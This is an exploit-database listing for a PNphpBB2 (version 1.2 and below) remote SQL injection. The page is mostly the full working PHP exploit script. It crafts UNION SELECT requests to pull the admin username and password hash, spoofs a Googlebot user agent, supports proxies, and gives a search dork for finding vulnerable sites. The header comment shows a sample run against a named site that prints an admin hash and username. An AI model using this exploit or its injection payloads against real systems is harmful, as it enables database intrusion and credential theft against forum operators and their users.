header-logo
Suggest Exploit
vendor:
PNphpBB2
by:
Kacper
7.5
CVSS
HIGH
Remote SQL Injection
Not provided
CWE
Product Name: PNphpBB2
Affected Version From: 1.2 and below
Affected Version To: 1.2
Patch Exists: NO
Related CWE: Not provided
CPE: Not provided
Metasploit:
Other Scripts:
Platforms Tested: Windows XP
Not provided

PNphpBB2 <= 1.2 Remote SQL Injection Exploit

This exploit allows an attacker to perform a remote SQL injection attack on PNphpBB2 version 1.2 and below. The attacker can execute arbitrary SQL queries on the database, potentially gaining unauthorized access to sensitive information or modifying the database.

Mitigation:

Update to a patched version of PNphpBB2 or apply appropriate security measures to prevent SQL injection attacks.
Source

Exploit-DB raw data:

<?/*
Exploit Name:
PNphpBB2 <= 1.2 Remote SQL Injection Exploit

Autor: Kacper
Contact: kacper1964@yahoo.pl
Homepage: http://www.rahim.webd.pl/
Kacper Hacking & Security Blog: http://kacper.bblog.pl/
Irc: irc.milw0rm.com:6667 #devilteam 

Pozdro dla wszystkich z kanalu IRC oraz forum DEVIL TEAM.

Pozdrawiam pl.zone-h.org, a najbardziej demo, oraz cala ekipe Zone-H.Org  :)

//dork: inurl:"index.php?name=PNphpBB2"

script homepage/download/demo: http://www.pnphpbb.com/


########################### START ##############################
Microsoft Windows XP [Wersja 5.1.2600] 
(C) Copyright 1985-2001 Microsoft Corp. 

C:\Documents and Settings\h4ck3r>C:\usr\php\php.exe c:\php.php 
Content-type: text/html 
X-Powered-By: PHP/4.3.9 


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 
Usage: php c:\php.php host path OPTIONS 
host: target server (ip/hostname) 
path: PNphpBB2 path 
Options: 
-p[port]: specify a port other than 80 
-P[ip:port]: specify a proxy 
-X[prefix]: database prefix 
-u[user_id]: user id from forum PNphpBB2 
Example: 
php c:\php.php 127.0.0.1 /PNphpBB2/ 
php c:\php.php 127.0.0.1 /PNphpBB2/ -Xnuke -u3 -P1.1.1.1:80 
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 

C:\Documents and Settings\h4ck3r>C:\usr\php\php.exe c:\php.php www.prawobrzeze.org / -Xnuke
Content-type: text/html 
X-Powered-By: PHP/4.3.9 

Prefix -> nuke 
+++++++++++++++++++++++++++++++++++++++++++++++++ 
Admin Password: 1be49aa89a83537aa59bc6fe8b80f255 
Admin Username: Finki

########################## THE END #############################

you only must now prefix :)

*/
if ($argc<3) {
print_r('
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Usage: php '.$argv[0].' host path OPTIONS
host:       target server (ip/hostname)
path:       PNphpBB2 path
Options:
 -p[port]:    specify a port other than 80
 -P[ip:port]: specify a proxy
 -X[prefix]:  database prefix
 -u[user_id]: user id from forum PNphpBB2
Example:
php '.$argv[0].' 127.0.0.1 /PNphpBB2/
php '.$argv[0].' 127.0.0.1 /PNphpBB2/ -Xnuke -u3 -P1.1.1.1:80
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
');
die;
}
error_reporting(7);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function wyslijpakiet($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    $parts[1]=(int)$parts[1];
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}
$host=$argv[1];
$path=$argv[2];
$prefix="pn";
$user_id="2";
$port=80;
$proxy="";
for ($i=3; $i<$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=(int)str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-X")
{
  $prefix=str_replace("-X","",$argv[$i]);
}
if ($temp=="-u")
{
  $user_id=str_replace("-u","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die("Bad path!");}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
function char_convert($my_string)
{
  $encoded="CHAR(";
  for ($k=0; $k<=strlen($my_string)-1; $k++)
  {
    $encoded.=ord($my_string[$k]);
    if ($k==strlen($my_string)-1) {$encoded.=")";}
    else {$encoded.=",";}
  }
  return $encoded;
}
if($prefix=="pn"){print "Default Prefix -> ".$prefix."\r\n";}
print "Prefix -> ".$prefix."\r\n";
print "+++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
$packet ="GET ".$p."index.php?name=PNphpBB2&file=index&c=1/**/UNION/**/SELECT/**/0,CONCAT(".char_convert("<DEVIL_TEAM-[").",user_password,".char_convert("]-Kacper>")."),2,3,4/**/FROM/**/".$prefix."_phpbb_users/**/WHERE/**/user_id=".$user_id."/* HTTP/1.0\r\n";
$packet.="Referer: http://".$host.$path."index.php\r\n";
$packet.="Accept-Language: pl\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t=explode("<DEVIL_TEAM-[",$html);
$t2=explode("]-Kacper>",$t[1]);
$pass=$t2[0];
echo "Admin Password: ".$pass."\r\n";
$packet ="GET ".$p."index.php?name=PNphpBB2&file=index&c=1/**/UNION/**/SELECT/**/0,CONCAT(".char_convert("<DEVIL_TEAM-[").",username,".char_convert("]-Kacper>")."),2,3,4/**/FROM/**/".$prefix."_phpbb_users/**/WHERE/**/user_id=".$user_id."/* HTTP/1.0\r\n";
$packet.="Referer: http://".$host.$path."category.php\r\n";
$packet.="Accept-Language: pl\r\n";
$packet.="User-Agent: Googlebot/2.1\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
wyslijpakiet($packet);
sleep(3);
$t=explode("<DEVIL_TEAM-[",$html);
$t2=explode("]-Kacper>",$t[1]);
$nick=$t2[0];
echo "Admin Username: ".$nick."\r\n";
if($pass==""){echo "exploit failed, check prefix !!!!!!!!!! (index.php?name=PNphpBB2&file=index&c='1)\r\n";
echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n";}
?>

# milw0rm.com [2007-06-03]